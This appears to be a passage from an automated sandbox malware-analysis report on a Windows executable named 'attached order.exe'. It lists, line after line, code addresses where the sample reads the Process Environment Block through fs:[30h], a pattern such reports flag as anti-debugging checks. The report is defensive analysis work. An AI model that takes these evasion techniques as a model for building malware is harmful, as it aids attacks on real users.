                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738009 mov eax, dword ptr fs:[00000030h]3_2_01738009
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172C0F6 mov eax, dword ptr fs:[00000030h]3_2_0172C0F6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BC0E0 mov ecx, dword ptr fs:[00000030h]3_2_017BC0E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017700A5 mov eax, dword ptr fs:[00000030h]3_2_017700A5
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172A093 mov ecx, dword ptr fs:[00000030h]3_2_0172A093
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172C090 mov eax, dword ptr fs:[00000030h]3_2_0172C090
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C6090 mov eax, dword ptr fs:[00000030h]3_2_017C6090
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE372 mov eax, dword ptr fs:[00000030h]3_2_017AE372
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE372 mov eax, dword ptr fs:[00000030h]3_2_017AE372
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE372 mov eax, dword ptr fs:[00000030h]3_2_017AE372
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE372 mov eax, dword ptr fs:[00000030h]3_2_017AE372
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0371 mov eax, dword ptr fs:[00000030h]3_2_017B0371
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0371 mov eax, dword ptr fs:[00000030h]3_2_017B0371
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175237A mov eax, dword ptr fs:[00000030h]3_2_0175237A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A350 mov eax, dword ptr fs:[00000030h]3_2_0176A350
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01728347 mov eax, dword ptr fs:[00000030h]3_2_01728347
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01728347 mov eax, dword ptr fs:[00000030h]3_2_01728347
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01728347 mov eax, dword ptr fs:[00000030h]3_2_01728347
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01768322 mov eax, dword ptr fs:[00000030h]3_2_01768322
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01768322 mov eax, dword ptr fs:[00000030h]3_2_01768322
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01768322 mov eax, dword ptr fs:[00000030h]3_2_01768322
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172E328 mov eax, dword ptr fs:[00000030h]3_2_0172E328
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172E328 mov eax, dword ptr fs:[00000030h]3_2_0172E328
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172E328 mov eax, dword ptr fs:[00000030h]3_2_0172E328
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174E310 mov eax, dword ptr fs:[00000030h]3_2_0174E310
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174E310 mov eax, dword ptr fs:[00000030h]3_2_0174E310
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174E310 mov eax, dword ptr fs:[00000030h]3_2_0174E310
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176631F mov eax, dword ptr fs:[00000030h]3_2_0176631F
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017643D0 mov ecx, dword ptr fs:[00000030h]3_2_017643D0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BE3DD mov eax, dword ptr fs:[00000030h]3_2_017BE3DD
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B43D5 mov eax, dword ptr fs:[00000030h]3_2_017B43D5
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172E3C0 mov eax, dword ptr fs:[00000030h]3_2_0172E3C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172E3C0 mov eax, dword ptr fs:[00000030h]3_2_0172E3C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172E3C0 mov eax, dword ptr fs:[00000030h]3_2_0172E3C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172C3C7 mov eax, dword ptr fs:[00000030h]3_2_0172C3C7
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017363CB mov eax, dword ptr fs:[00000030h]3_2_017363CB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AC3B0 mov eax, dword ptr fs:[00000030h]3_2_017AC3B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175A390 mov eax, dword ptr fs:[00000030h]3_2_0175A390
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175A390 mov eax, dword ptr fs:[00000030h]3_2_0175A390
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175A390 mov eax, dword ptr fs:[00000030h]3_2_0175A390
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01750230 mov ecx, dword ptr fs:[00000030h]3_2_01750230
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0227 mov eax, dword ptr fs:[00000030h]3_2_017B0227
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0227 mov eax, dword ptr fs:[00000030h]3_2_017B0227
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0227 mov eax, dword ptr fs:[00000030h]3_2_017B0227
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A22B mov eax, dword ptr fs:[00000030h]3_2_0176A22B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A22B mov eax, dword ptr fs:[00000030h]3_2_0176A22B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A22B mov eax, dword ptr fs:[00000030h]3_2_0176A22B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172821B mov eax, dword ptr fs:[00000030h]3_2_0172821B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172A200 mov eax, dword ptr fs:[00000030h]3_2_0172A200
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017402F9 mov eax, dword ptr fs:[00000030h]3_2_017402F9
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A2E0 mov eax, dword ptr fs:[00000030h]3_2_0173A2E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A2E0 mov eax, dword ptr fs:[00000030h]3_2_0173A2E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A2E0 mov eax, dword ptr fs:[00000030h]3_2_0173A2E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A2E0 mov eax, dword ptr fs:[00000030h]3_2_0173A2E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A2E0 mov eax, dword ptr fs:[00000030h]3_2_0173A2E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A2E0 mov eax, dword ptr fs:[00000030h]3_2_0173A2E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017382E0 mov eax, dword ptr fs:[00000030h]3_2_017382E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017382E0 mov eax, dword ptr fs:[00000030h]3_2_017382E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017382E0 mov eax, dword ptr fs:[00000030h]3_2_017382E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017382E0 mov eax, dword ptr fs:[00000030h]3_2_017382E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172C2B0 mov ecx, dword ptr fs:[00000030h]3_2_0172C2B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017542AF mov eax, dword ptr fs:[00000030h]3_2_017542AF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017542AF mov eax, dword ptr fs:[00000030h]3_2_017542AF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE289 mov eax, dword ptr fs:[00000030h]3_2_017AE289
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174C560 mov eax, dword ptr fs:[00000030h]3_2_0174C560
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C6550 mov eax, dword ptr fs:[00000030h]3_2_017C6550
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FA553 mov eax, dword ptr fs:[00000030h]3_2_017FA553
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174E547 mov eax, dword ptr fs:[00000030h]3_2_0174E547
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01766540 mov eax, dword ptr fs:[00000030h]3_2_01766540
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01768540 mov eax, dword ptr fs:[00000030h]3_2_01768540
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173254C mov eax, dword ptr fs:[00000030h]3_2_0173254C
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772539 mov eax, dword ptr fs:[00000030h]3_2_01772539
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174252B mov eax, dword ptr fs:[00000030h]3_2_0174252B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BC51D mov eax, dword ptr fs:[00000030h]3_2_017BC51D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E507 mov eax, dword ptr fs:[00000030h]3_2_0175E507
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01732500 mov eax, dword ptr fs:[00000030h]3_2_01732500
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C50D mov eax, dword ptr fs:[00000030h]3_2_0176C50D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C50D mov eax, dword ptr fs:[00000030h]3_2_0176C50D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BC5FC mov eax, dword ptr fs:[00000030h]3_2_017BC5FC
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A5E7 mov ebx, dword ptr fs:[00000030h]3_2_0176A5E7
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A5E7 mov eax, dword ptr fs:[00000030h]3_2_0176A5E7
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017665D0 mov eax, dword ptr fs:[00000030h]3_2_017665D0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C5C6 mov eax, dword ptr fs:[00000030h]3_2_0176C5C6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B05C6 mov eax, dword ptr fs:[00000030h]3_2_017B05C6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017345B0 mov eax, dword ptr fs:[00000030h]3_2_017345B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017345B0 mov eax, dword ptr fs:[00000030h]3_2_017345B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B85AA mov eax, dword ptr fs:[00000030h]3_2_017B85AA
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01762594 mov eax, dword ptr fs:[00000030h]3_2_01762594
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BC592 mov eax, dword ptr fs:[00000030h]3_2_017BC592
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE588 mov eax, dword ptr fs:[00000030h]3_2_017AE588
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE588 mov eax, dword ptr fs:[00000030h]3_2_017AE588
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A580 mov eax, dword ptr fs:[00000030h]3_2_0176A580
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A580 mov eax, dword ptr fs:[00000030h]3_2_0176A580
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738470 mov eax, dword ptr fs:[00000030h]3_2_01738470
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738470 mov eax, dword ptr fs:[00000030h]3_2_01738470
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BE461 mov eax, dword ptr fs:[00000030h]3_2_017BE461
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FA464 mov eax, dword ptr fs:[00000030h]3_2_017FA464
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E45E mov eax, dword ptr fs:[00000030h]3_2_0175E45E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E45E mov eax, dword ptr fs:[00000030h]3_2_0175E45E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E45E mov eax, dword ptr fs:[00000030h]3_2_0175E45E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E45E mov eax, dword ptr fs:[00000030h]3_2_0175E45E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E45E mov eax, dword ptr fs:[00000030h]3_2_0175E45E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740445 mov eax, dword ptr fs:[00000030h]3_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740445 mov eax, dword ptr fs:[00000030h]3_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740445 mov eax, dword ptr fs:[00000030h]3_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740445 mov eax, dword ptr fs:[00000030h]3_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740445 mov eax, dword ptr fs:[00000030h]3_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740445 mov eax, dword ptr fs:[00000030h]3_2_01740445
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0443 mov eax, dword ptr fs:[00000030h]3_2_017B0443
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C6400 mov eax, dword ptr fs:[00000030h]3_2_017C6400
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C6400 mov eax, dword ptr fs:[00000030h]3_2_017C6400
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172640D mov eax, dword ptr fs:[00000030h]3_2_0172640D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017364F0 mov eax, dword ptr fs:[00000030h]3_2_017364F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A4F0 mov eax, dword ptr fs:[00000030h]3_2_0176A4F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A4F0 mov eax, dword ptr fs:[00000030h]3_2_0176A4F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BE4F2 mov eax, dword ptr fs:[00000030h]3_2_017BE4F2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BE4F2 mov eax, dword ptr fs:[00000030h]3_2_017BE4F2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E4EF mov eax, dword ptr fs:[00000030h]3_2_0176E4EF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E4EF mov eax, dword ptr fs:[00000030h]3_2_0176E4EF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017544D1 mov eax, dword ptr fs:[00000030h]3_2_017544D1
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017544D1 mov eax, dword ptr fs:[00000030h]3_2_017544D1
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C84BB mov eax, dword ptr fs:[00000030h]3_2_017C84BB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E4BC mov eax, dword ptr fs:[00000030h]3_2_0176E4BC
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017324A2 mov eax, dword ptr fs:[00000030h]3_2_017324A2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017324A2 mov ecx, dword ptr fs:[00000030h]3_2_017324A2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017644A8 mov eax, dword ptr fs:[00000030h]3_2_017644A8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BC490 mov eax, dword ptr fs:[00000030h]3_2_017BC490
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730485 mov ecx, dword ptr fs:[00000030h]3_2_01730485
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176648A mov eax, dword ptr fs:[00000030h]3_2_0176648A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176648A mov eax, dword ptr fs:[00000030h]3_2_0176648A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176648A mov eax, dword ptr fs:[00000030h]3_2_0176648A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01760774 mov eax, dword ptr fs:[00000030h]3_2_01760774
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01734779 mov eax, dword ptr fs:[00000030h]3_2_01734779
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01734779 mov eax, dword ptr fs:[00000030h]3_2_01734779
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01742760 mov ecx, dword ptr fs:[00000030h]3_2_01742760
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01752755 mov eax, dword ptr fs:[00000030h]3_2_01752755
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01752755 mov eax, dword ptr fs:[00000030h]3_2_01752755
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01752755 mov eax, dword ptr fs:[00000030h]3_2_01752755
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01752755 mov ecx, dword ptr fs:[00000030h]3_2_01752755
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01752755 mov eax, dword ptr fs:[00000030h]3_2_01752755
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01752755 mov eax, dword ptr fs:[00000030h]3_2_01752755
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A750 mov eax, dword ptr fs:[00000030h]3_2_0176A750
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017DE750 mov eax, dword ptr fs:[00000030h]3_2_017DE750
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173471B mov eax, dword ptr fs:[00000030h]3_2_0173471B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173471B mov eax, dword ptr fs:[00000030h]3_2_0173471B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175270D mov eax, dword ptr fs:[00000030h]3_2_0175270D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175270D mov eax, dword ptr fs:[00000030h]3_2_0175270D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175270D mov eax, dword ptr fs:[00000030h]3_2_0175270D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E7E0 mov eax, dword ptr fs:[00000030h]3_2_0175E7E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017CC7B0 mov eax, dword ptr fs:[00000030h]3_2_017CC7B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017CC7B0 mov eax, dword ptr fs:[00000030h]3_2_017CC7B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017307A7 mov eax, dword ptr fs:[00000030h]3_2_017307A7
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE79D mov eax, dword ptr fs:[00000030h]3_2_017AE79D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE79D mov eax, dword ptr fs:[00000030h]3_2_017AE79D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE79D mov eax, dword ptr fs:[00000030h]3_2_017AE79D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE79D mov eax, dword ptr fs:[00000030h]3_2_017AE79D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE79D mov eax, dword ptr fs:[00000030h]3_2_017AE79D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE79D mov eax, dword ptr fs:[00000030h]3_2_017AE79D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE79D mov eax, dword ptr fs:[00000030h]3_2_017AE79D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE79D mov eax, dword ptr fs:[00000030h]3_2_017AE79D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE79D mov eax, dword ptr fs:[00000030h]3_2_017AE79D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730670 mov eax, dword ptr fs:[00000030h]3_2_01730670
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772670 mov eax, dword ptr fs:[00000030h]3_2_01772670
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772670 mov eax, dword ptr fs:[00000030h]3_2_01772670
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176666D mov esi, dword ptr fs:[00000030h]3_2_0176666D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176666D mov eax, dword ptr fs:[00000030h]3_2_0176666D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176666D mov eax, dword ptr fs:[00000030h]3_2_0176666D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BE660 mov eax, dword ptr fs:[00000030h]3_2_017BE660
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176265C mov eax, dword ptr fs:[00000030h]3_2_0176265C
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176265C mov ecx, dword ptr fs:[00000030h]3_2_0176265C
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176265C mov eax, dword ptr fs:[00000030h]3_2_0176265C
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C640 mov eax, dword ptr fs:[00000030h]3_2_0176C640
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C640 mov eax, dword ptr fs:[00000030h]3_2_0176C640
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730630 mov eax, dword ptr fs:[00000030h]3_2_01730630
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01760630 mov eax, dword ptr fs:[00000030h]3_2_01760630
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B8633 mov esi, dword ptr fs:[00000030h]3_2_017B8633
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B8633 mov eax, dword ptr fs:[00000030h]3_2_017B8633
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B8633 mov eax, dword ptr fs:[00000030h]3_2_017B8633
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C620 mov eax, dword ptr fs:[00000030h]3_2_0176C620
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804600 mov eax, dword ptr fs:[00000030h]3_2_01804600
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AC6F2 mov eax, dword ptr fs:[00000030h]3_2_017AC6F2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AC6F2 mov eax, dword ptr fs:[00000030h]3_2_017AC6F2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173C6E0 mov eax, dword ptr fs:[00000030h]3_2_0173C6E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017566E0 mov eax, dword ptr fs:[00000030h]3_2_017566E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017566E0 mov eax, dword ptr fs:[00000030h]3_2_017566E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C66D0 mov eax, dword ptr fs:[00000030h]3_2_017C66D0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C66D0 mov eax, dword ptr fs:[00000030h]3_2_017C66D0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017306CF mov eax, dword ptr fs:[00000030h]3_2_017306CF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FA6C0 mov eax, dword ptr fs:[00000030h]3_2_017FA6C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017D86C2 mov eax, dword ptr fs:[00000030h]3_2_017D86C2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F86A8 mov eax, dword ptr fs:[00000030h]3_2_017F86A8
